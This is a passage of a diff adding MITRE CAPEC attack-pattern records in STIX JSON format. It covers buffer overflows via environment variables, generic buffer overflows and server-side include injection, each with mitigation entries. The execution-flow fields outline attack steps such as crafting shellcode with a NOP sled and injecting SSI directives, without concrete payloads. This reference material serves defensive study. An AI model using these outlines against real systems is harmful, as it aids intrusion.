and access those access mechanisms directly." + }, + "x_capec_status": "Draft", + "x_capec_typical_severity": "High", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "\n In a J2EE setting, administrators can associate a role that is impossible for the authenticator to grant users, such as \"NoAccess\", with all Servlets to which access is guarded by a limited number of servlets visible to, and accessible by, the user.\n Having done so, any direct access to those protected Servlets will be prohibited by the web container.\n In a more general setting, the administrator must mark every resource besides the ones supposed to be exposed to the user as accessible by a role impossible for the user to assume. The default security setting must be to deny access and then grant access only to those resources intended by business logic.\n ", + "id": "course-of-action--0d8de0b8-e9fd-44b2-8f1f-f8aae79949be", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-1-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--c796a053-8016-4098-9d01-e680e042cb24", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--0d8de0b8-e9fd-44b2-8f1f-f8aae79949be", + "spec_version": "2.1", + "target_ref": "attack-pattern--92cdcd3d-d734-4442-afc3-4599f261498b", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "This attack pattern involves causing a buffer overflow through manipulation of environment variables. Once the adversary finds that they can modify an environment variable, they may try to overflow associated buffers. This attack leverages implicit trust often placed in environment variables.", + "external_references": [ + { + "external_id": "CAPEC-10", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/10.html" + }, + { + "external_id": "CWE-120", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/120.html" + }, + { + "external_id": "CWE-302", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/302.html" + }, + { + "external_id": "CWE-118", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/118.html" + }, + { + "external_id": "CWE-119", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/119.html" + }, + { + "external_id": "CWE-74", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/74.html" + }, + { + "external_id": "CWE-99", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/99.html" + }, + { + "external_id": "CWE-20", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/20.html" + }, + { + "external_id": "CWE-680", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/680.html" + }, + { + "external_id": "CWE-733", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/733.html" + }, + { + "external_id": "CWE-697", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/697.html" + }, + { + "description": "Buffer Overflow via Environment Variables", + "source_name": "OWASP Attacks", + "url": "https://owasp.org/www-community/attacks/Buffer_Overflow_via_Environment_Variables" + }, + { + "description": "G. Hoglund, G. McGraw, Exploiting Software: How to Break Code, 2004--02, Addison-Wesley", + "external_id": "REF-1", + "source_name": "reference_from_CAPEC" + }, + { + "description": "Sharefuzz", + "external_id": "REF-2", + "source_name": "reference_from_CAPEC", + "url": "http://sharefuzz.sourceforge.net" + } + ], + "id": "attack-pattern--4a29d66d-8617-4382-b456-578ecdb1609e", + "modified": "2022-09-29T00:00:00.000Z", + "name": "Buffer Overflow via Environment Variables", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_can_follow_refs": [ + "attack-pattern--ca989a50-b24e-4917-a234-ce4788fa21c7" + ], + "x_capec_child_of_refs": [ + "attack-pattern--77e51461-7843-411c-a90e-852498957f76" + ], + "x_capec_consequences": { + "Access_Control": [ + "Gain Privileges" + ], + "Authorization": [ + "Gain Privileges" + ], + "Availability": [ + "Unreliable Execution", + "Execute Unauthorized Commands (Run Arbitrary Code)" + ], + "Confidentiality": [ + "Execute Unauthorized Commands (Run Arbitrary Code)", + "Read Data", + "Gain Privileges" + ], + "Integrity": [ + "Execute Unauthorized Commands (Run Arbitrary Code)", + "Modify Data" + ] + }, + "x_capec_domains": [ + "Software" + ], + "x_capec_example_instances": [ + "\n A buffer overflow in sccw allows local users to gain root access via the $HOME environmental variable. See also: CVE-1999-0906\n ", + "\n A buffer overflow in the rlogin program involves its consumption of the $TERM environmental variable. See also: CVE-1999-0046\n " + ], + "x_capec_execution_flow": "

Execution Flow

Explore

  1. Identify target application: The adversary identifies a target application or program to perform the buffer overflow on. In this attack the adversary looks for an application that loads the content of an environment variable into a buffer.

Experiment

  1. Find injection vector: The adversary identifies an injection vector to deliver the excessive content to the targeted application's buffer.

    2. Techniques
    Change the values of environment variables thought to be used by the application to contain excessive data. If the program is loading the value of the environment variable into a buffer, this could cause a crash and an attack vector will be found.

  2. Craft overflow content: The adversary crafts the content to be injected. If the intent is to simply cause the software to crash, the content need only consist of an excessive quantity of random data. If the intent is to leverage the overflow for execution of arbitrary code, the adversary crafts the payload in such a way that the overwritten return address is replaced with one of the adversary's choosing.

    3. Techniques
    Create malicious shellcode that will execute when the program execution is returned to it.
    Use a NOP-sled in the overflow content to more easily \"slide\" into the malicious code. This is done so that the exact return address need not be correct, only in the range of all of the NOPs

Exploit

  1. Overflow the buffer: Using the injection vector, the adversary injects the crafted overflow content into the buffer.

", + "x_capec_extended_description": "Although the focus of this attack is putting excessive content into an environment variable that is loaded into a buffer, environment variables can be used to assist a classic buffer overflow attack as well. In the case where the buffer used in a traditional buffer overflow attack is not large enough to store the adversary's shell code, they will store the shell code in an environment variable and attempt to return to its address, rather than back into the data they wrote to the buffer.", + "x_capec_likelihood_of_attack": "High", + "x_capec_prerequisites": [ + "The application uses environment variables.", + "An environment variable exposed to the user is vulnerable to a buffer overflow.", + "The vulnerable environment variable uses untrusted data.", + "Tainted data used in the environment variables is not properly validated. For instance boundary checking is not done before copying the input data to a buffer." + ], + "x_capec_skills_required": { + "High": "Exploiting a buffer overflow to inject malicious code into the stack of a software system or even the heap can require a higher skill level.", + "Low": "An attacker can simply overflow a buffer by inserting a long string into an attacker-modifiable injection vector. The result can be a DoS." + }, + "x_capec_status": "Draft", + "x_capec_typical_severity": "High", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Do not expose environment variable to the user.", + "id": "course-of-action--0dfd5de3-6691-47d2-abfd-21299e9f040b", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-10-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--6afe60c3-f515-4128-a724-0989e27e5bb0", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--0dfd5de3-6691-47d2-abfd-21299e9f040b", + "spec_version": "2.1", + "target_ref": "attack-pattern--4a29d66d-8617-4382-b456-578ecdb1609e", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Do not use untrusted data in your environment variables.", + "id": "course-of-action--76f448da-5586-4aae-b516-46ff7c52ba87", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-10-1", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--371669b4-ddf9-41df-b755-093aa08a1c2d", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--76f448da-5586-4aae-b516-46ff7c52ba87", + "spec_version": "2.1", + "target_ref": "attack-pattern--4a29d66d-8617-4382-b456-578ecdb1609e", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Use a language or compiler that performs automatic bounds checking", + "id": "course-of-action--950e1236-9a75-40d0-a5f7-1c1777109da5", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-10-2", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--5981e722-08a7-4513-8c85-f487b377ebfb", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--950e1236-9a75-40d0-a5f7-1c1777109da5", + "spec_version": "2.1", + "target_ref": "attack-pattern--4a29d66d-8617-4382-b456-578ecdb1609e", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "There are tools such as Sharefuzz [REF-2] which is an environment variable fuzzer for Unix that support loading a shared library. You can use Sharefuzz to determine if you are exposing an environment variable vulnerable to buffer overflow.", + "id": "course-of-action--9a8c3aec-f2ce-4b6e-b416-33f58933ac90", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-10-3", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--d48d20f4-9361-40f9-81b3-74f2f8b86bea", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--9a8c3aec-f2ce-4b6e-b416-33f58933ac90", + "spec_version": "2.1", + "target_ref": "attack-pattern--4a29d66d-8617-4382-b456-578ecdb1609e", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Buffer Overflow attacks target improper or missing bounds checking on buffer operations, typically triggered by input injected by an adversary. As a consequence, an adversary is able to write past the boundaries of allocated buffer regions in memory, causing a program crash or potentially redirection of execution as per the adversaries' choice.", + "external_references": [ + { + "external_id": "CAPEC-100", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/100.html" + }, + { + "external_id": "CWE-120", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/120.html" + }, + { + "external_id": "CWE-119", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/119.html" + }, + { + "external_id": "CWE-131", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/131.html" + }, + { + "external_id": "CWE-129", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/129.html" + }, + { + "external_id": "CWE-805", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/805.html" + }, + { + "external_id": "CWE-680", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/680.html" + }, + { + "description": "Buffer Overflow", + "external_id": "07", + "source_name": "WASC", + "url": "http://projects.webappsec.org/Buffer-Overflow" + }, + { + "description": "Buffer overflow attack", + "source_name": "OWASP Attacks", + "url": "https://owasp.org/www-community/attacks/Buffer_overflow_attack" + }, + { + "description": "OWASP Vulnerabilities, The Open Web Application Security Project (OWASP)", + "external_id": "REF-620", + "source_name": "reference_from_CAPEC", + "url": "https://owasp.org/www-community/vulnerabilities/Buffer_Overflow" + } + ], + "id": "attack-pattern--77e51461-7843-411c-a90e-852498957f76", + "modified": "2021-10-21T00:00:00.000Z", + "name": "Overflow Buffers", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "attack-pattern", + "x_capec_abstraction": "Standard", + "x_capec_child_of_refs": [ + "attack-pattern--476ca631-2695-43f8-82f6-83c06a07ae36" + ], + "x_capec_consequences": { + "Access_Control": [ + "Gain Privileges" + ], + "Authorization": [ + "Gain Privileges" + ], + "Availability": [ + "Unreliable Execution", + "Execute Unauthorized Commands (Run Arbitrary Code)" + ], + "Confidentiality": [ + "Execute Unauthorized Commands (Run Arbitrary Code)", + "Gain Privileges" + ], + "Integrity": [ + "Execute Unauthorized Commands (Run Arbitrary Code)" + ] + }, + "x_capec_domains": [ + "Software" + ], + "x_capec_example_instances": [ + "The most straightforward example is an application that reads in input from the user and stores it in an internal buffer but does not check that the size of the input data is less than or equal to the size of the buffer. If the user enters excessive length data, the buffer may overflow leading to the application crashing, or worse, enabling the user to cause execution of injected code.", + "Many web servers enforce security in web applications through the use of filter plugins. An example is the SiteMinder plugin used for authentication. An overflow in such a plugin, possibly through a long URL or redirect parameter, can allow an adversary not only to bypass the security checks but also execute arbitrary code on the target web server in the context of the user that runs the web server process." + ], + "x_capec_execution_flow": "

Execution Flow

Explore

  1. Identify target application: The adversary identifies a target application or program to perform the buffer overflow on. Adversaries often look for applications that accept user input and that perform manual memory management.

Experiment

  1. Find injection vector: The adversary identifies an injection vector to deliver the excessive content to the targeted application's buffer.

    2. Techniques
    Provide large input to a program or application and observe the behavior. If there is a crash, this means that a buffer overflow attack is possible.

  2. Craft overflow content: The adversary crafts the content to be injected. If the intent is to simply cause the software to crash, the content need only consist of an excessive quantity of random data. If the intent is to leverage the overflow for execution of arbitrary code, the adversary crafts the payload in such a way that the overwritten return address is replaced with one of the adversary's choosing.

    3. Techniques
    Create malicious shellcode that will execute when the program execution is returned to it.
    Use a NOP-sled in the overflow content to more easily \"slide\" into the malicious code. This is done so that the exact return address need not be correct, only in the range of all of the NOPs

Exploit

  1. Overflow the buffer: Using the injection vector, the adversary injects the crafted overflow content into the buffer.

", + "x_capec_likelihood_of_attack": "High", + "x_capec_parent_of_refs": [ + "attack-pattern--4a29d66d-8617-4382-b456-578ecdb1609e", + "attack-pattern--c4a0c765-e4ca-43c2-996e-08ce13ae8f80", + "attack-pattern--d591235a-da3b-4872-8962-27fe44fa1ab0", + "attack-pattern--4b856ceb-8bf7-4f0e-b423-89a420455b1d", + "attack-pattern--3c08bb9d-43b5-4468-8b38-387c6cb60da7", + "attack-pattern--d3634072-88f9-4711-987f-6bff7698bd4c", + "attack-pattern--5d5ff43b-cbe7-4986-bfec-cf979f97e6b9", + "attack-pattern--8e403d18-af4e-4abd-bd38-0f99f74b4636", + "attack-pattern--e61f5dd9-d26e-454f-ab07-171f3dea6e73", + "attack-pattern--4cd18074-15c1-4206-8391-115685669623", + "attack-pattern--e62000f0-addd-4156-b9fd-469bbb211d45", + "attack-pattern--b6a2983b-1d97-4698-b210-961ed0523f33" + ], + "x_capec_prerequisites": [ + "Targeted software performs buffer operations.", + "Targeted software inadequately performs bounds-checking on buffer operations.", + "Adversary has the capability to influence the input to buffer operations." + ], + "x_capec_resources_required": [ + "None: No specialized resources are required to execute this type of attack. Detecting and exploiting a buffer overflow does not require any resources beyond knowledge of and access to the target system." + ], + "x_capec_skills_required": { + "High": "In cases of directed overflows, where the motive is to divert the flow of the program or application as per the adversaries' bidding, high level skills are required. This may involve detailed knowledge of the target system architecture and kernel.", + "Low": "In most cases, overflowing a buffer does not require advanced skills beyond the ability to notice an overflow and stuff an input variable with content." + }, + "x_capec_status": "Draft", + "x_capec_typical_severity": "Very High", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Use a language or compiler that performs automatic bounds checking.", + "id": "course-of-action--a253c485-f225-4dd3-b0ba-dbe4b29fa134", + "modified": "2021-10-21T00:00:00.000Z", + "name": "coa-100-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--cedea035-6835-4307-a59b-acd58ec23ecd", + "modified": "2021-10-21T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--a253c485-f225-4dd3-b0ba-dbe4b29fa134", + "spec_version": "2.1", + "target_ref": "attack-pattern--77e51461-7843-411c-a90e-852498957f76", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Use secure functions not vulnerable to buffer overflow.", + "id": "course-of-action--5549f741-7e5e-4f04-86bd-90dceb9c0de9", + "modified": "2021-10-21T00:00:00.000Z", + "name": "coa-100-1", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--394fe1bb-8b4d-4638-b4e8-2a5719efe438", + "modified": "2021-10-21T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--5549f741-7e5e-4f04-86bd-90dceb9c0de9", + "spec_version": "2.1", + "target_ref": "attack-pattern--77e51461-7843-411c-a90e-852498957f76", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "If you have to use dangerous functions, make sure that you do boundary checking.", + "id": "course-of-action--07b3e24d-8000-4c35-881d-2eaae3f2411e", + "modified": "2021-10-21T00:00:00.000Z", + "name": "coa-100-2", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--774c708f-2480-4cee-8e04-c42d603760e8", + "modified": "2021-10-21T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--07b3e24d-8000-4c35-881d-2eaae3f2411e", + "spec_version": "2.1", + "target_ref": "attack-pattern--77e51461-7843-411c-a90e-852498957f76", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Compiler-based canary mechanisms such as StackGuard, ProPolice and the Microsoft Visual Studio /GS flag. Unless this provides automatic bounds checking, it is not a complete solution.", + "id": "course-of-action--115171ef-9f32-43b6-bb8a-49f0a78286e9", + "modified": "2021-10-21T00:00:00.000Z", + "name": "coa-100-3", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--d04362e0-439c-40a1-bfa2-cbddb7b33bbd", + "modified": "2021-10-21T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--115171ef-9f32-43b6-bb8a-49f0a78286e9", + "spec_version": "2.1", + "target_ref": "attack-pattern--77e51461-7843-411c-a90e-852498957f76", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Use OS-level preventative functionality. Not a complete solution.", + "id": "course-of-action--b8955156-d3d6-4db5-bc3b-595bda29964b", + "modified": "2021-10-21T00:00:00.000Z", + "name": "coa-100-4", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--7aae34f4-823f-43ac-90e9-fa33251c4236", + "modified": "2021-10-21T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--b8955156-d3d6-4db5-bc3b-595bda29964b", + "spec_version": "2.1", + "target_ref": "attack-pattern--77e51461-7843-411c-a90e-852498957f76", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Utilize static source code analysis tools to identify potential buffer overflow weaknesses in the software.", + "id": "course-of-action--61ed4ed4-15a0-4d2a-b38c-482bf5e682a5", + "modified": "2021-10-21T00:00:00.000Z", + "name": "coa-100-5", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--7f190864-e6a8-45f8-af58-75124f4f4914", + "modified": "2021-10-21T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--61ed4ed4-15a0-4d2a-b38c-482bf5e682a5", + "spec_version": "2.1", + "target_ref": "attack-pattern--77e51461-7843-411c-a90e-852498957f76", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An attacker can use Server Side Include (SSI) Injection to send code to a web application that then gets executed by the web server. Doing so enables the attacker to achieve similar results to Cross Site Scripting, viz., arbitrary code execution and information disclosure, albeit on a more limited scale, since the SSI directives are nowhere near as powerful as a full-fledged scripting language. Nonetheless, the attacker can conveniently gain access to sensitive files, such as password files, and execute shell commands.", + "external_references": [ + { + "external_id": "CAPEC-101", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/101.html" + }, + { + "external_id": "CWE-97", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/97.html" + }, + { + "external_id": "CWE-74", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/74.html" + }, + { + "external_id": "CWE-20", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/20.html" + }, + { + "description": "SSI Injection", + "external_id": "36", + "source_name": "WASC", + "url": "http://projects.webappsec.org/SSI-Injection" + }, + { + "description": "Server-Side Includes (SSI) Injection", + "source_name": "OWASP Attacks", + "url": "https://owasp.org/www-community/attacks/Server-Side_Includes_(SSI)_Injection" + }, + { + "description": "OWASP Web Security Testing Guide, The Open Web Application Security Project (OWASP)", + "external_id": "REF-610", + "source_name": "reference_from_CAPEC", + "url": "https://owasp.org/www-project-web-security-testing-guide/latest/4-Web_Application_Security_Testing/07-Input_Validation_Testing/08-Testing_for_SSI_Injection.html" + } + ], + "id": "attack-pattern--4e7abad3-5853-4e4b-a64e-7f23f10f8656", + "modified": "2021-10-21T00:00:00.000Z", + "name": "Server Side Include (SSI) Injection", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_can_precede_refs": [ + "attack-pattern--03a731ef-751b-43de-9159-9667d4be4d1a" + ], + "x_capec_child_of_refs": [ + "attack-pattern--5a33bee7-5ec9-4e75-9bf6-99fdaca8699c" + ], + "x_capec_consequences": { + "Availability": [ + "Execute Unauthorized Commands (Run Arbitrary Code)" + ], + "Confidentiality": [ + "Read Data", + "Execute Unauthorized Commands (Run Arbitrary Code)" + ], + "Integrity": [ + "Execute Unauthorized Commands (Run Arbitrary Code)" + ] + }, + "x_capec_domains": [ + "Software" + ], + "x_capec_example_instances": [ + "\n Consider a website hosted on a server that permits Server Side Includes (SSI), such as Apache with the \"Options Includes\" directive enabled.\n Whenever an error occurs, the HTTP Headers along with the entire request are logged, which can then be displayed on a page that allows review of such errors. A malicious user can inject SSI directives in the HTTP Headers of a request designed to create an error.\n When these logs are eventually reviewed, the server parses the SSI directives and executes them.\n " + ], + "x_capec_execution_flow": "

Execution Flow

Explore

  1. Determine applicability: The adversary determines whether server side includes are enabled on the target web server.

    2. Techniques
    Look for popular page file names. The attacker will look for .shtml, .shtm, .asp, .aspx, and other well-known strings in URLs to help determine whether SSI functionality is enabled.
    Fetch .htaccess file. In Apache web server installations, the .htaccess file may enable server side includes in specific locations. In those cases, the .htaccess file lives inside the directory where SSI is enabled, and is theoretically fetchable from the web server. Although most web servers deny fetching the .htaccess file, a misconfigured server will allow it. Thus, an attacker will frequently try it.

Experiment

  1. Find Injection Point: Look for user controllable input, including HTTP headers, that can carry server side include directives to the web server.

    2. Techniques
    Use a spidering tool to follow and record all links. Make special note of any links that include parameters in the URL.
    Use a proxy tool to record all links visited during a manual traversal of the web application. Make special note of any links that include parameters in the URL. Manual traversal of this type is frequently necessary to identify forms that are GET method forms rather than POST forms.

Exploit

  1. Inject SSI: Using the found injection point, the adversary sends arbitrary code to be inlcuded by the application on the server side. They may then need to view a particular page in order to have the server execute the include directive and run a command or open a file on behalf of the adversary.

", + "x_capec_likelihood_of_attack": "High", + "x_capec_prerequisites": [ + "A web server that supports server side includes and has them enabled", + "User controllable input that can carry include directives to the web server" + ], + "x_capec_resources_required": [ + "None: No specialized resources are required to execute this type of attack. Determining whether the server supports SSI does not require special tools, and nor does injecting directives that get executed. Spidering tools can make the task of finding and following links easier." + ], + "x_capec_skills_required": { + "Medium": "The attacker needs to be aware of SSI technology, determine the nature of injection and be able to craft input that results in the SSI directives being executed." + }, + "x_capec_status": "Draft", + "x_capec_typical_severity": "High", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Set the OPTIONS IncludesNOEXEC in the global access.conf file or local .htaccess (Apache) file to deny SSI execution in directories that do not need them", + "id": "course-of-action--64214f54-8438-43c3-8052-8927af7d98bc", + "modified": "2021-10-21T00:00:00.000Z", + "name": "coa-101-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--3428ab3f-34a5-436a-98f2-9be0a5397f94", + "modified": "2021-10-21T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--64214f54-8438-43c3-8052-8927af7d98bc", + "spec_version": "2.1", + "target_ref": "attack-pattern--4e7abad3-5853-4e4b-a64e-7f23f10f8656", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "All user controllable input must be appropriately sanitized before use in the application. This includes omitting, or encoding, certain characters or strings that have the potential of being interpreted as part of an SSI directive", + "id": "course-of-action--8dc4376f-e920-42a2-9578-575c37c7c146", + "modified": "2021-10-21T00:00:00.000Z", + "name": "coa-101-1", + "object_marking_refs": [ + 